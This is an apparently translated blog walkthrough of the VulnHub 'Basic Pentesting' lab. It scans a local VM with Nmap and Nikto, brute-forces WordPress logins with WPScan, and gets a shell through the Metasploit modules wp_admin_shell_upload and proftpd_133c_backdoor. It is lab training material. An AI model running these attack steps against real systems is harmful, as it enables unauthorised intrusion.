VulnHub Basic Pentesting

Good day to all.

Many of you know about Pentest, someone even had a deal with him, and someone just heard and would like to feel like a mini expert in this field. A long time ago, or maybe not long ago, a laboratory appeared on VulnHub , dedicated to just that.

ACT I - Setup

For the work, I used Kali Linux and VirtualBox, and of course the lab itself.
Now we need to connect 2 cars. Make it simple: open cmd and go to the directory where VirtualBox is installed and write settings for VboxManage

Commands for customizing VBoxManage

cd C:\Program Files\Oracle\VirtualBox

 C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable>

Now in the Kali and Pentest settings we put the name of the network, which was written in cmd

ACT II - In the beginning

Check if Kali Linux sees our lab.

We see the connection on eth0 . Now we need to know the specific IP of our machine. To do this, use the well-known program Nmap

IP of our laboratory 10.0.1.2

ACT III - Basic Pentesting

After Nmap scanned our virtual network, we saw that there were 3 ports open on the lab:

21 - ftp
22 - ssh
80 - http

We try to connect to port 80. To do this, open the browser (in my case, this is FireFox)

Fine! The site is working. Let's check what directories he is hiding from us. To do this, use the wonderful program nikto and look at the result.

 OSVDB-3092: /secret/: This might be interesting

The secret directory should be interesting. Let's find out what she is hiding

It looks, of course, on 3 out of 10, but this can all be fixed, in the name of beauty and convenience, naturally.

The most attentive, probably already guessed, and nikto with Nmap hinted to us more than once.

  - Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/> - Nmap scan report for vtcsec (10.0.1.2)

Let's add the name in the hosts, via terminal:

 # echo "10.0.1.2 vtcsec" >> /etc/hosts

Now we are ready to see the beauty of the site.

Now, as search engines, we look at all the directories of the site, poke at everything that is poked, and in the end we find out that the site is written in WordPress. Yes - yes, Nikto told us this before, but we are not looking for easy ways.

Let's use WordPress vulnerability scanner - WPScan

 # wpscan --url http://10.0.1.2/secret/

WPScan output

WordPress Security Scanner by the WPScan Team
Version 2.9.3
Sponsored by Sucuri - https://sucuri.net
@ WPScan , @ ethicalhack3r, @erwan_lr, pvdl, @ FireFart

Hmmm, let's try to list all user names using the --enumerate u flag.

 # wpscan --url http://10.0.1.2/secret/ --enumerate u

There is only one user. So, you can try to shuffle the password.

 # wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2

Unfortunately, our brute was not successful, but we saw something interesting - the admin login password and admin password error.

It will be necessary to try to conduct exploit through Metasploit

ACT IV - Admin is coming

First you need to set up Metasploit .

 #/etc/init.d/postgresql start # msfdb init

We start!

 # msfconsole

Need to find our exploit. Use the search command

 # search admin

From the list, wp_admin_shell_upload

Run it and configure it.

 # msf>use exploit/unix/webapp/wp_admin_shell_upload # msf>set username admin # msf>set password admin # msf>set rhost 10.0.1.2 # msf>set targeturi /secret

It should turn out like this:

Run!

Go to the browser and go under admin / admin.

ACT V - I see backdoor

Now we will try to get access to the terminal. To do this again, we need Metasploit.

 # msf>use exploit/unix/ftp/proftpd_133c_backdoor

We are setting up

 # msf>set rhost 10.0.1.2

Run! (you can use exploit instead of run )

Tadaaam, we got access to the console.

Source: https://habr.com/ru/post/352684/

All Articles